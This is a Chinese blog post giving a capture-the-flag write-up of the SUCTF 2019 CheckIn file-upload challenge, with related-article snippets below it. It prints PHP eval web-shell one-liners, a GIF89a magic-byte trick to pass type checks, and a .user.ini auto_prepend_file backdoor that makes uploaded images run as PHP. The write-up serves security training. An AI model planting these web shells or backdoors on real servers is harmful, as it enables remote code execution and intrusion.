[SUCTF 2019]CheckIn

最新推荐文章于 2024-02-01 15:31:42 发布
最新推荐文章于 2024-02-01 15:31:42 发布
阅读量1.3k 收藏
点赞数
文章标签: 蓝桥杯 职场和发展
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stantic/article/details/124977806
版权

498da66f9da1404ebd2af116e2b373bb.png

 一个文件上传的题目,直接上传php文件试试,发现被过滤了2e6c51a3aded421b85d2d9e7335b7e58.png

然后再上传一个把后缀名改为png的一句话45db2ffa55d54e9698c366d3c1003d53.png

发现不能右?,那就用无<?的一句话

<script language="php">eval($_GET['cmd']);</script>
再次上传png后缀的一句话,提示
exif_imagetype,这个函数是获取文件的第一个字节,来确定文件是什么类型,那就直接再文件的开头加一个GIF89a来绕过

df526a4494f04c5bb2f598ee0861396e.png

 691b049c4d92403db30d127c5cf96100.png

 上传成功,但是无法解析内容,试了试上传.htaccess文件,但是无法利用,看了下,说是nginx的服务器,不是apache的,所以不能用.htaccess文件,但是不知道怎么看出来的

那就换一个,用.user.ini文件,.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。

其中有两个配置,可以用来制造后门:
auto_append_file、auto_prepend_file
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:

auto_prepend_file=test.jpg

或者

auto_append_file=test.jpg

使文件解析为php文件的前提是包含再一个php文件中,所以就利用index.php文件来使之解析b7e88ac69d07464f9157d4c26a62c995.png

 f1b2092e192d4bb29bc219cec9cd1c50.png

a41b48c1141d4cf99fdc98f6ef78641a.png 

fccb6801fc1f4c3b9ce9dd98a86e037f.png 

 对于这题就是要根据提示来改变自己的一句话形式,多用.htaccess或者.user.ini这样的好东西。

 

stantic
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
checkin-system
05-19
GS SHOP签到系统 著名的Bootstrap模板(免费)+ Node.js + mongoDB 入门(适用于开发人员) 1.安装node.js 安装并启动node.js。 ( ) $ node --version 安装并启动mongoDB。 ( ) $ cd mongodb $ mkdir -p data/db $ bin/mongod --dbpath data/db & 2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获图像 执照 麻省理工学院
checkin
03-18
报到 此仓库包含为测试“深层链接”教程而开发的“酒店基本入住”网站应用程序。 部署方式 通过单击以下按钮之一,您可以轻松地免费将自己的Web应用程序版本免费部署到Heroku。 起动机 最终的
glados_checkin
03-25
glados定时签到
BUUCTF [SUCTF 2019]CheckIn 1(user.ini文件构成的PHP后门 | 两种解法!)
m0_73734159的博客
11-28 1385
只需要重新开启题目环境即可,最后,做这道题的步骤是,先上传.user.ini配置文件,再去上传PHP一句话木马文件。因为我们使用的是auto_prepend_file,在主文件之前就已经自动解析文件名了,所以index.php主文件在最后面。php.ini大家都熟悉,那么我们就可以把.user.ini理解为用户可自定义的php.ini配置文件。绕过后缀的文件格式有php、php3、php4、php5、phtml、pht。.user.ini配置文件和.htaccess配置文件都是为了解析PHP代码。
[SUCTF 2019]CheckIn1-BUUCTF-xing
最新发布
chinese_cabbage0的博客
02-01 393
web安全
[SUCTF 2019]CheckIn(文件上传)
记录学习,一起进步
03-27 444
[SUCTF 2019]CheckIn(文件上传)
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1082
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
BUUCTF:[SUCTF 2019]CheckIn
末初的CSDN博客
11-04 1265
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 上传文件后缀名黑名单机制,常用php及相关可解析扩展名等无法成功上传 使用.user.ini构造后门 user.ini如何构造后门详情见P神:https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html 首先制造图片马 图片马不能包含<?,使用 <script language="php">eval($.
[SUCTF 2019]CheckIn (.htaccess和.user.ini)
开心星人的博客
08-09 535
他们的作用就是指定一个文件(1.jpg),那么该文件就会被包含在要执行的php文件中(index.php)但不知道什么原因(可能是时间限制,自动删除了),我们刚才上传的evil.jpg不在了,重新上传一下即可。然后尝试使用antsword连接,但是发现连不上,不太确定哪里出了问题。意思是如果文件中有一个evil.jpg的文件,他就会被解析为.php。将后缀名改成jpg(虽然绕过了,但是解析不了,所以没啥用)尝试.htaccess和.user.ini。尝试.user.ini。成功了,但是无法解析。......
[SUCTF 2019]CheckIn(.user.ini)
qq_44657899的博客
03-05 1433
模式 含义 PHP_INI_USER 可在用户脚本(例如 ini_set())或 Windows 注册表(自 PHP 5.3 起)以及 .user.ini 中设定 PHP_INI_PERDIR 可在 php.ini,.htaccess 或 httpd.conf 中设定 PHP_INI_SYSTEM 可在 php.ini 或 httpd.conf 中设定 PHP_INI_ALL 可在任何地方设定
BUUCTF——[SUCTF 2019]CheckIn 1
weixin_45864041的博客
09-27 3378
根据普通的文件上传漏洞走 上传shell.jpg后可以看见上传失败,并且对文件的内容进行了检查。所以,我们换一种木马形式。 用shell.phtml进行上传。 上传失败,对文件内容进行了检查。利用文件幻术头进行绕过。 上传成功。接下来,我们再一次上传并抓包,修改文件后缀 上传又失败了。如果我们仅上传jpg文件,是无法让我们通过中国菜刀进行连接的。 最后束手无策只有看了一下大佬的wp 又学到了新姿势。 可以上传一个.user.ini 文件,当我们对目录中的任何php文件进行访问时,都会调用.use.
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2729
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
git checkin
05-12
你可能想问的是 git commit 命令,它用于将代码更改提交到本地 Git 仓库中。可以使用以下命令提交更改: ``` git add . # 添加所有更改 git commit -m "提交信息" # 提交更改并添加提交信息 ``` 请注意,在提交代码之前,您需要使用 git add 命令将更改添加到“暂存区”,然后才能使用 git commit 命令将更改提交到本地仓库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值